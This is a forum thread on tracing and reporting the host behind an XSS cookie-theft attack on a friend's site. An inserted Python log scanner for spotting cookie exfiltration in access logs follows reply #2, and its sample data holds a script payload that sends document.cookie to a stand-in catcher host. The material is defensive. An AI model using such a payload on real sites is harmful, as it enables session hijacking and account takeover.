
Thread: Reporting XSS attacks

  1. #1
    Senior Member
    Join Date
    Dec 2004
    Posts
    320

    Reporting XSS attacks

    Hey all, long time no see. Just stoppin in to ask a quick question.

    Recently a friend of mine's website was hit with a successful XSS cookie theft. He did the usual thing those 1337 h4xZ0rZ like to do (deface the site, change everyone's password, etc.). Now, I have a pretty good idea of where he had his cookie catcher (or whatever you want to call it), the CGI script that handles the incoming +document.cookie information. Problem is he registered with GoDaddy.com but used domainsbyproxy.com as his registrant information. So, my question is: who should I get in contact with? Would it be the registrar or the domainsbyproxy guys? Thanks in advance.
    The fool doth think he is wise, but the wiseman knows himself to be a fool - Good Ole Bill Shakespeare

  2. #2
    Senior Member t34b4g5's Avatar
    Join Date
    Sep 2003
    Location
    Australia.
    Posts
    2,391
    Just do a password reset on the hosting server, and with the domain registrar.
    Hopefully the email address, secret question, etc. have not yet been changed by the attacker.

    If they just happened to get lucky with the XSS and decided to be a pain, that would explain the passwords being changed.

    Hopefully they aren't smart enough to have worked out that they should also change the registrant email address etc. with the hosting account and domain name account.

    Also, if your friend wanted to know where the cookie script was located, then just get them to check their logs, and they should see a remote website.
    Then once he has worked out where the script was held, just make reports to the needed people and have his website etc. closed down.
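
The log check suggested in reply #2, as an added example that is not part of the original thread: it scans access-log lines for requests whose decoded URL reads `document.cookie` and names an off-site host, which is the address to put in an abuse report. The hostnames, IP addresses, sample log lines and function names are all constructed assumptions.

```python
import re
from urllib.parse import quote, unquote

OWN_HOSTS = {"www.friend-site.example"}  # assumption: the victim site's own hostnames
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "[A-Z]+ (\S+)')
COOKIE_READ = re.compile(r"document\s*\.\s*cookie", re.I)
REMOTE = re.compile(r"(?:https?:)?//([a-z0-9.-]+\.[a-z]{2,})(/[^\s'\"<>+]*)?", re.I)

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%253C -> %3C -> <), bounded to 3 passes."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_cookie_exfil(log_lines):
    """Return (client_ip, timestamp, remote_host, remote_path) for requests whose
    decoded URL reads document.cookie and points at a host that is not ours."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue
        ip, ts, target = m.groups()
        decoded = fully_decode(target)
        if not COOKIE_READ.search(decoded):
            continue
        for host, path in REMOTE.findall(decoded):
            if host.lower() not in OWN_HOSTS:
                hits.append((ip, ts, host.lower(), path or "/"))
    return hits

# Constructed sample data (not from the thread): combined-format access log lines.
_PAYLOAD = "<script>document.location='http://catcher.example/cgi-bin/c.cgi?'+document.cookie</script>"
def _line(ip, target):
    return f'{ip} - - [12/Mar/2005:10:00:00 +0000] "GET {target} HTTP/1.1" 200 512 "-" "Mozilla/5.0"'

SAMPLE_LOG = [
    _line("203.0.113.7", "/forum/view.php?id=4"),                      # ordinary request
    _line("203.0.113.9", "/search.php?q=" + quote(_PAYLOAD, safe="")),  # single-encoded
    _line("198.51.100.23", "/search.php?q=" + quote(quote(_PAYLOAD, safe=""), safe="")),  # double-encoded
    _line("203.0.113.7", "/help.php?topic=document.cookie"),           # no remote host
]

if __name__ == "__main__":
    for hit in find_cookie_exfil(SAMPLE_LOG):
        print(*hit, sep="  ")
```

Access logs record only the request line, so a payload submitted in a POST body will not show up here; an empty result does not rule out a stored injection.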

  3. #3
    Senior Member
    Join Date
    Oct 2003
    Location
    MA
    Posts
    1,052
    Make sure he uses software that is updated and http://www.nullcube.com/software/cub.../subs/xss.html
